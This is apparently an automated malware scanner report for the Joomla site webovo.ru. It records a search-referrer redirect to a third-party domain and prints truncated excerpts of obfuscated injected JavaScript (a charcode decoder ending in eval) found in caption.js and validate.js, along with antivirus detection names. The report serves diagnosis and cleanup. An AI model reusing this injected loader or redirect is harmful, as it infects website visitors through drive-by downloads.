Malware Scanner report for webovo.ru

Malicious/Suspicious/Total urls checked
2/0/18
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://brg-catalogues.com/mxut.html?h=2848373
52 websites infected.

The website "webovo.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Malicious/Suspicious Redirects

Request | Server response | Status
URL: http://webovo.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: webovo.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Sep 2014 10:09:28 GMT
Location: http://brg-catalogues.com/mxut.html?h=2848373
Server: nginx
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

Request | Server response | Status
http://webovo.ru/
200 OK
Content-Length: 12746
Content-Type: text/html
clean
http://webovo.ru/media/system/js/caption.js
200 OK
Content-Length: 32531
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 3152 bytes are skipped ...
1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Antivirus reports:

AntiVir | JS/Redirector.PM.10
Avast | JS:Crypt-A [Trj]
Ad-Aware | Trojan.JS.Iframe.BJT
Ikarus | Trojan.Script
Rising | JS:Hack.Exploit.Script.JS.IframeRef.a!1610720
nProtect | Trojan.JS.Iframe.BJT
K7AntiVirus | Trojan ( 6e85836f0 )
Comodo | TrojWare.JS.Agent.HJ
Emsisoft | Trojan.JS.Iframe.BJT (B)
CAT-QuickHeal | JS/BlacoleRef.BA
K7GW | Exploit ( 04c556d01 )
McAfee-GW-Edition | JS/Exploit-Blacole.ht
DrWeb | JS.IFrame.233
TrendMicro | HEUR_HTJS.HDJSFN
Microsoft | Trojan:JS/Redirector.JN
Kaspersky | Trojan-Downloader.JS.Agent.gqu
MicroWorld-eScan | Trojan.JS.Iframe.BJT
Fortinet | JS/Crypt.CAAD!tr
TotalDefense | JS/BlacoleRef.M
Jiangmin | Trojan/Script.Gen
McAfee | JS/Exploit-Blacole.ht
NANO-Antivirus | Trojan.Script.Agent.rrcam
ClamAV | Trojan.Blackhole-483
F-Secure | Trojan.JS.Iframe.BJT
VIPRE | Trojan-Downloader.JS.Agent.gup (v)
F-Prot | JS/Redir.JX
AVG | Script/Exploit.Kit
Norman | Downloader.HIVI
Sophos | Mal/ScrLd-A
GData | Trojan.JS.Iframe.BJT
Symantec | Trojan.Malscript!html
Commtouch | JS/Redir.JX
ESET-NOD32 | JS/Agent.NEK
BitDefender | Trojan.JS.Iframe.BJT

http://webovo.ru/index.php?option=com_banners&task=click&bid=1
HTTP/1.1 303 See other
Connection: close
Date: Thu, 25 Sep 2014 10:09:30 GMT
Location: http://webovo.ru/index.php
Server: nginx
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3761570878738758076547a8fa90229d=34203fbbf35207a7b85e1a076c270ec7; path=/
X-Powered-By: PHP/5.2.17
clean
http://webovo.ru/index.php
200 OK
Content-Length: 12746
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=article&id=1&Itemid=2
200 OK
Content-Length: 18586
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=article&id=2&Itemid=3
200 OK
Content-Length: 19034
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=article&id=3&Itemid=4
200 OK
Content-Length: 14876
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=5
200 OK
Content-Length: 11000
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=2&Itemid=6
200 OK
Content-Length: 11008
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7
200 OK
Content-Length: 17815
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8
200 OK
Content-Length: 10978
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=9
200 OK
Content-Length: 10988
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_contact&view=contact&id=1&Itemid=10
200 OK
Content-Length: 13265
Content-Type: text/html
clean
http://webovo.ru/media/system/js/validate.js
200 OK
Content-Length: 22371
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JFormValidator = new Class({
initialize: function()
{
this.handlers = Object();
this.custom = Object();
this.setHandler('username',
function (value) {
regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i");
return !regex.test(value);
}
);
this.setHandler('password',
function (value) {
regex=/^\S[\S ]{2,98}\S$/;
return regex.test(value);
}
);
this.setHandler('numeric
... 3319 bytes are skipped ...
1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-687!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Antivirus reports:

AntiVir | JS/Dldr.Agent.AX.18
Avast | JS:Crypt-A [Trj]
Ad-Aware | Trojan.JS.Iframe.BJT
Ikarus | Trojan.Script
nProtect | Trojan.JS.Iframe.BJT
K7AntiVirus | Exploit ( 04c556f11 )
TrendMicro-HouseCall | JS_BLACOLE.AJO
Comodo | TrojWare.JS.Agent.HJ
Emsisoft | Trojan.JS.Iframe.BJT (B)
CAT-QuickHeal | JS/BlacoleRef.BA
K7GW | Exploit ( 04c556f11 )
DrWeb | JS.IFrame.233
TrendMicro | JS_BLACOLE.AJO
Microsoft | Trojan:JS/Redirector.JN
Kaspersky | Trojan-Downloader.JS.Agent.gqu
MicroWorld-eScan | Trojan.JS.Iframe.BJT
Tencent | Unk.Win32.Script.400114
Fortinet | JS/Crypt.CAAD!tr
TotalDefense | JS/BlacoleRef.M
Jiangmin | Trojan/Script.Gen
McAfee | JS/Exploit-Blacole.ht
NANO-Antivirus | Trojan.Script.Agent.rrcam
ClamAV | Trojan.Blackhole-483
F-Secure | Trojan.JS.Iframe.BJT
VIPRE | Trojan-Downloader.JS.Agent.gup (v)
F-Prot | JS/Redir.JX
AVG | Script/Exploit.Kit
Sophos | Mal/ScrLd-A
GData | Trojan.JS.Iframe.BJT
Symantec | Trojan.Malscript!html
Commtouch | JS/Redir.JX
AVware | Trojan-Downloader.JS.Agent.gup (v)
ESET-NOD32 | JS/Agent.NEK
BitDefender | Trojan.JS.Iframe.BJT

http://webovo.ru/index.php?option=com_banners&task=click&bid=2
HTTP/1.1 303 See other
Connection: close
Date: Thu, 25 Sep 2014 10:09:37 GMT
Location: http://webovo.ru/index.php
Server: nginx
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3761570878738758076547a8fa90229d=c245d057368ad6e94fcd4540b0302388; path=/
X-Powered-By: PHP/5.2.17
clean
http://webovo.ru/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Sep 2014 10:09:37 GMT
Location: http://err.agava.ru/vh/404.html
Server: nginx
Content-Type: text/html; charset=iso-8859-1
clean
http://err.agava.ru/vh/404.html
200 OK
Content-Length: 12338
Content-Type: text/html
clean
http://err.agava.ru/vh/js/main.js
200 OK
Content-Length: 34164
Content-Type: application/x-javascript
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=webovo.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webovo.ru/

Result: webovo.ru is not infected or malware details are not published yet.